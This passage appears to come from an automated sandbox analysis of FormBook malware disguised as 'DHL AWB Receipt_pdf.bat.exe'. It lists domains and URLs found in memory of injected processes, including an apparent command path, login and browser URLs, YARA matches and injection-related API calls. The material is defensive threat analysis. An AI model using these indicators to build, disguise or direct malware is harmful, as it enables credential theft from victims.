Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.rsbi.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.salesa.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.sencare.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.spacebuilders.net
Source: V7C903J7TTVs.exe, 00000012.00000002.4577146791.0000000005850000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.spacewalker.app
Source: V7C903J7TTVs.exe, 00000012.00000002.4577146791.0000000005850000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.spacewalker.app/j7xf/
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.stayplus.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.summergames.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.supercanal.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.swisshemp.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.taffix.net/binding
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.taquzhibo.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.taquzhibo.net/binding
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.thebossclub.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theflowerpot.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.thisit.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.urbanscout.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.wanyuezhibo.net
Source: V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.workandhealth.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.wuhaozhibo.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.wuyezhibo.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.xianglizhibo.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.xiaokongzhibo.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.xiaoyingzhibo.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.xingyezhibo.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.xishizhibo.com
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.xiuchangzhibo.com
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.xiulizhibo.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.xiumozhibo.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.xiupazhibo.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.xiyezhibo.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.xuetuzhibo.com
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.yecaozhibo.com
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.yechuizhibo.com
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.yewuzhibo.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.yueguangzhibo.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.yumba.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.yundouzhibo.com
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.yundouzhibo.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.yurenzhibo.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.zeeshop.net
Source: EhStorAuthn.exe, 00000011.00000002.4578230703.000000000764B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://beian.miit.gov.cn/#/Integrated/index
Source: EhStorAuthn.exe, 00000011.00000002.4578230703.000000000764B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005922000.00000004.10000000.00040000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004282000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: EhStorAuthn.exe, 00000011.00000002.4578230703.000000000764B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: EhStorAuthn.exe, 00000011.00000002.4578230703.000000000764B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EhStorAuthn.exe, 00000011.00000002.4578230703.000000000764B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: EhStorAuthn.exe, 00000011.00000002.4578230703.000000000764B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: EhStorAuthn.exe, 00000011.00000002.4578230703.000000000764B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.00000000052DA000.00000004.10000000.00040000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000003C3A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://error.skycloud.tw/system/error?code=400
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://img.ucdl.pp.uc.cn/upload_files/wdj_web/public/img/favicon.ico
Source: EhStorAuthn.exe, 00000011.00000002.4574054013.0000000002634000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: EhStorAuthn.exe, 00000011.00000002.4574054013.0000000002634000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: EhStorAuthn.exe, 00000011.00000002.4574054013.0000000002634000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: EhStorAuthn.exe, 00000011.00000002.4574054013.0000000002634000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: EhStorAuthn.exe, 00000011.00000002.4574054013.0000000002634000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: EhStorAuthn.exe, 00000011.00000002.4574054013.0000000002634000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: EhStorAuthn.exe, 00000011.00000003.2536487290.0000000007626000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://push.zhanzhang.baidu.com/push.js
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://ucan.25pp.com/Wandoujia_wandoujia_qrbinded.apk
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://white.anva.org.cn/
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.12377.cn/
Source: DHL AWB Receipt_pdf.bat.exe, nlvpnyUnaRqfA.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: EhStorAuthn.exe, 00000011.00000002.4578230703.000000000764B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://zzlz.gsxt.gov.cn/

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.4573592974.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4575252245.00000000040A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2351320245.0000000001900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4577146791.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4575297734.00000000040F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2349664896.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4575057978.0000000004B90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2354807978.0000000003C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample	Static PE information: Filename: DHL AWB Receipt_pdf.bat.exe
Source: initial sample	Static PE information: Filename: DHL AWB Receipt_pdf.bat.exe

PE file contains section with special chars

Source: DHL AWB Receipt_pdf.bat.exe	Static PE information: section name: Y8QY(+(j
Source: nlvpnyUnaRqfA.exe.0.dr	Static PE information: section name: Y8QY(+(j

PE file has nameless sections

Source: DHL AWB Receipt_pdf.bat.exe	Static PE information: section name:
Source: nlvpnyUnaRqfA.exe.0.dr	Static PE information: section name:

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0042C763 NtClose,	9_2_0042C763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2B60 NtClose,LdrInitializeThunk,	9_2_019D2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_019D2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_019D2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D35C0 NtCreateMutant,LdrInitializeThunk,	9_2_019D35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D4340 NtSetContextThread,	9_2_019D4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D4650 NtSuspendThread,	9_2_019D4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2B80 NtQueryInformationFile,	9_2_019D2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2BA0 NtEnumerateValueKey,	9_2_019D2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2BF0 NtAllocateVirtualMemory,	9_2_019D2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2BE0 NtQueryValueKey,	9_2_019D2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2AB0 NtWaitForSingleObject,	9_2_019D2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2AD0 NtReadFile,	9_2_019D2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2AF0 NtWriteFile,	9_2_019D2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2DB0 NtEnumerateKey,	9_2_019D2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2DD0 NtDelayExecution,	9_2_019D2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2D10 NtMapViewOfSection,	9_2_019D2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2D00 NtSetInformationFile,	9_2_019D2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2D30 NtUnmapViewOfSection,	9_2_019D2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2CA0 NtQueryInformationToken,	9_2_019D2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2CC0 NtQueryVirtualMemory,	9_2_019D2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2CF0 NtOpenProcess,	9_2_019D2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2C00 NtQueryInformationProcess,	9_2_019D2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2C60 NtCreateKey,	9_2_019D2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2F90 NtProtectVirtualMemory,	9_2_019D2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2FB0 NtResumeThread,	9_2_019D2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2FA0 NtQuerySection,	9_2_019D2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2FE0 NtCreateFile,	9_2_019D2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2F30 NtCreateSection,	9_2_019D2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2F60 NtCreateProcessEx,	9_2_019D2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2E80 NtReadVirtualMemory,	9_2_019D2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2EA0 NtAdjustPrivilegesToken,	9_2_019D2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2EE0 NtQueueApcThread,	9_2_019D2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2E30 NtWriteVirtualMemory,	9_2_019D2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D3090 NtSetValueKey,	9_2_019D3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D3010 NtOpenDirectoryObject,	9_2_019D3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D39B0 NtGetContextThread,	9_2_019D39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D3D10 NtOpenProcessToken,	9_2_019D3D10
